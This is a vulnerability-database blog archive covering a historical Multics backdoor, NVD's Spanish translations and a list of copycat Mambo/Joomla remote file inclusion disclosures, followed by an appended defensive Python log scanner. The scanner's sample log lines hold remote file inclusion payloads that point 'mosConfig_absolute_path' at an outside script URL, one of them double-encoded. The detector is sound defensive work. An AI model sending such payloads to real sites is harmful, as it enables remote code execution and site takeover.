Category Archives: Vulnerability Sociology

Fascinating Vulnerability and Glimpse Into 33 Year Old Pen-Testing

Today, we pushed OSVDB 82447 which covers a backdoor in the Multics Operating System. For those not familiar with this old OS, there is an entire domain covering the fascinating history behind the development of Multics. OSVDB 82447 is titled “Multics Unspecified Third-party Backdoor” and gives an interesting insight into backdoors distributed by vendors. In this case, a third-party planted it, told the vendor, and Honeywell still distributed the operating system anyway. I encourage you to read the full paper by Lieutenant Colonel Roger R. Schell, a member of the tiger team that carried out the attack.

To summarize:

During a US Air Force sanctioned penetration test of mainframe computers, sometime before 1979, the tiger team ended up penetrating a Multics installation at Honeywell. In an account of what happened later, a paper said that the tiger team “modified the manufacturer’s master copy of the Multics operating system itself” and injected a backdoor. The backdoor code was described as being small, “fewer than 10 instructions out of 100,000” and required a password for use. The report continues, saying that even though Honeywell was told it was there and how it worked, their technicians could not find it. Subsequently, the backdoor was distributed in future installations of Multics.

It would be interesting to know why Honeywell didn’t ask for, or didn’t receive, the specific modified code from the Air Force tiger team, and why they opted to distribute it to customers. Perhaps they thought if their own technicians couldn’t find the backdoor, no one else could. Even more interesting is why a tiger team was sanctioned to carry out a penetration test that not only gave them access to the “master copy” of Multics, but why they were allowed to actually place the backdoor there. When they heard Honeywell couldn’t find it, why didn’t they insist on ensuring it was removed before installation at customer locations? This brings a new twist to the ethics of penetration testing, at least in a historical context.

English is a Funny Language

NVD announced this week that they are now going to expand and provide vulnerability information in Spanish. I found this a bit amusing since OSVDB once thought that translating the database was a critical feature that needed to be delivered back in 2002. In fact, all of the language support was in the original OSVDB database schema and the backend code was created to handle it as we truly thought this would be implemented.

However, we quickly realized there were several issues with this concept including finding people to perform the translations! Additional concerns were raised as we spoke to more people in the security industry which included many conversations with non-US based security professionals (including a long ranting conversation with FX at Defcon). The critical concern was that much of the true meaning of the vulnerability is lost when the information is translated. The bottom line is that it was strongly believed that the vulnerability information in OSVDB should remain only in English.

OSVDB decided that we would not proceed any further with official plans to translate the database; however, we have been contacted by other people that have wanted to translate OSVDB and we have provided permission to do so…

Here is a copy of the NVD announcement:

The National Vulnerability Database (NVD) is expanding to provide vulnerability translations. The first translation data feed is in Spanish and is being provided in cooperation with Inteco (http://www.inteco.es/), an entity of the Spanish government’s Ministry of Industry, Tourism, and Commerce (http://www.mityc.es/). Inteco is providing the translations and is solely responsible for the translation content. NVD is providing the translation infrastructure. The result of this cooperative effort is that NVD now contains an XML feed with 7,858 Spanish translations for the Common Vulnerabilities and Exposures (CVE) dictionary of security related software flaws. This feed will be maintained with translations for all new CVE vulnerabilities and, as with the other NVD data feeds, the data can be incorporated into commercial products and services with no licensing fees or restrictions. The translations are available through translation XML feeds at http://nvd.nist.gov/download.cfm#transxml.

We would love to hear any further thoughts (good and bad) on the value of translating vulnerability information into other languages.


Vulnerability Research Food Chain

I’ve mentioned the sociology aspect of the hacker, vuln researcher and security companies before, specifically how they interact, how one will influence another and more. The list of fun ideas I have on these topics is great, and maybe some day I’ll find the time to write more on them. In the meantime, this obvious one popped up and focuses on vulnerability researchers, how they find bugs, and how some feed off the work of others. We see this often where ResearcherA will find a vulnerability in one script, disclose the information, and ResearcherB will follow up shortly after with the same type of vulnerability in a different script of the same product.

Recently we’ve seen a rash of remote file inclusion bugs in various add-ons to Mambo and Joomla. These add-ons are typically not written by the same developers nor are they distributed with the base installation of each product. However, they all seem to have one thing in common: “mosConfig_absolute_path” (or sometimes “absolute_path”). The same variable is being exploited in dozens of different add-ons and being found by different people. If we examine the chain of disclosure, can we see patterns in who consistently does follow-up research (low hanging fruit) instead of finding original vulnerabilities? Are there more observations in the way they are disclosed such as reporting to exploit sites vs Bugtraq or Full Disclosure? Are there misplaced signs of ego that accompany what amounts to trivial vulnerability finds while others are more modest and take it for what it is? Is it surprising that as people jump on the bandwagon, more and more reports end up being inaccurate and not a real vulnerability?

While skimming the list, strike-out text indicates the vulnerability has been disputed or proven false. The names of the researchers who didn’t fully check their find are in bold (and I’m curious if the other disclosures hold up under scrutiny). There is one occurrence of italics that potentially shows this type of “research” being used in the wild.

2006-08-21 bigAPE-Backup for Mambo – mdx
2006-08-20 Display MOSBot Manager for Mambo – O.U.T.L.A.W (Aria-security)
2006-08-20 EstateAgent for Mambo – O.U.T.L.A.W (Aria-security)
2006-08-19 CatalogShop for Mambo – O.U.T.L.A.W (Aria-security)
2006-08-18 Joomla x-shop – Crackers_Child
2006-08-18 Joomla Rssxt – Crackers_Child
2006-08-18 Kochsuite for Joomla – camino (Insecurity Research Team)
2006-08-18 mtg_myhomepage For Mambo – O.U.T.L.A.W (Aria-security)
2006-08-18 mambo-phphop Product Scroller – O.U.T.L.A.W (Aria-security)
2006-08-17 contentpublisher for Mambo – Crackers_Child
2006-08-17 MambelFish for Mambo – mdx
2006-08-17 JIM for Joomla – XORON
2006-08-17 mosListMessenger for Mambo – Crackers_Child
2006-08-17 anjel for Mambo – Crackers_Child
2006-08-16 Coppermine for Mambo – k1tk4t
2006-08-16 Reporter for Mambo – Crackers_Child
2006-08-16 com_lm for Mambo – Crackers_Child
2006-08-14 MMP for Mambo – mdx
2006-08-14 PeopleBook for Mambo – Matdhule
2006-08-10 Remository for Mambo – camino (Insecurity Research Team)
2006-08-07 JD-Wiki for Joomla – jank0 (hackbsd crew)
2006-07-31 Mambatstaff for Mambo – Dr.Jr7
2006-07-30 UHP for Mambo – Kurdish Security
2006-07-29 artlinks for Mambo – Dr.Jr7
2006-07-29 Colophon for Joomla – Drago84 (Exclusive Security Italian Security)
2006-07-28 Security Images for Joomla – Drago84
2006-07-28 MGM for Mambo – A-S-T TEAM
2006-07-28 Guestbook for Mambo – Matdhule
2006-07-24 PrinceClan Chess for Mambo – Tr_ZiNDaN
2006-07-20 MultiBanners for Mambo – Blue|Spy
2006-07-17 Mambo-SMF Forum – ASIANEAGLE
2006-07-17 VideoDB for Mambo – h4ntu (#batamhacker crew)
2006-07-17 LoudMouth for Mambo – h4ntu (#batamhacker crew)
2006-07-17 PollXT for Joomla – vitux
2006-07-17 Calendar for Mambo – Matdhule
2006-07-17 New Article for Mambo – Ahmad Maulana a.k.a Matdhule
2006-07-13 perForms for Joomla – “Vuln founded in a log file: lazy 0day!!! :D”
2006-07-12 Hashcash for Joomla – Ahmad Maulana a.k.a Matdhule
2006-07-12 SiteMap for Mambo – Ahmad Maulana a.k.a Matdhule
2006-07-12 HTMLArea3 for Mambo – Ahmad Maulana a.k.a Matdhule
2006-07-10 PccookBook for Mambo – Ahmad Maulana a.k.a Matdhule
2006-07-07 ExtCalendar for Mambo – Ahmad Maulana a.k.a Matdhule
2006-07-03 Galleria for Mambo – sikunYuk
2006-06-26 CBSMS Mambo Module – Kw3[R]Ln (Romanian Security Team)
2006-06-13 Jobline for Mambo – SpC-x

While all of this is not necessarily useful to many, this line of research and observation is fascinating.
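A defender-side check for the pattern described in this post, added here as an example and not code from the original post or from OSVDB: it scans web server access logs for requests that set “mosConfig_absolute_path” or “absolute_path” to a remote URL. The combined log format, the sample lines, the addresses and the component paths are constructed assumptions, as is the choice of URL schemes treated as remote.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Parameter names taken from the post; compared case-insensitively.
RFI_PARAMS = {"mosconfig_absolute_path", "absolute_path"}
# Assumption: a value starting with one of these schemes points at a remote host.
REMOTE_VALUE = re.compile(r"^\s*(?:https?|ftps?)://", re.IGNORECASE)
# Client address and request target from a combined-format access log entry.
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_decode(value, rounds=3):
    """Undo nested percent-encoding (e.g. %2568ttp) for a few rounds."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_rfi_attempts(log_lines):
    """Return (client, path, parameter, value) for each suspicious request."""
    hits = []
    for line in log_lines:
        match = REQUEST.match(line)
        if not match:
            continue  # not a request line we understand
        client, target = match.groups()
        url = urlsplit(target)
        # parse_qsl decodes one layer; fully_decode removes any further layers.
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            value = fully_decode(value)
            if name.lower() in RFI_PARAMS and REMOTE_VALUE.match(value):
                hits.append((client, url.path, name, value))
    return hits

# Constructed sample log lines (documentation addresses, made-up component paths).
SAMPLE_LOG = [
    '198.51.100.7 - - [18/Aug/2006:10:02:11 +0000] "GET /components/com_example/'
    'example.php?mosConfig_absolute_path=http://192.0.2.10/x.txt? HTTP/1.0" 200 512',
    '198.51.100.9 - - [18/Aug/2006:10:05:40 +0000] "GET /modules/mod_example.php'
    '?absolute_path=%2568ttp%253A%252F%252F192.0.2.10%252Fx.txt HTTP/1.1" 200 87',
    '203.0.113.4 - - [18/Aug/2006:10:06:02 +0000] "GET /index.php?option='
    'com_content&task=view&id=5 HTTP/1.1" 200 9120',
    '203.0.113.4 - - [18/Aug/2006:10:07:15 +0000] "GET /components/com_example/'
    'example.php?mosConfig_absolute_path=/var/www/html HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    for hit in find_rfi_attempts(SAMPLE_LOG):
        print(hit)
```

Only remote-looking values are flagged; the last sample line, which supplies a local path, is not reported.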
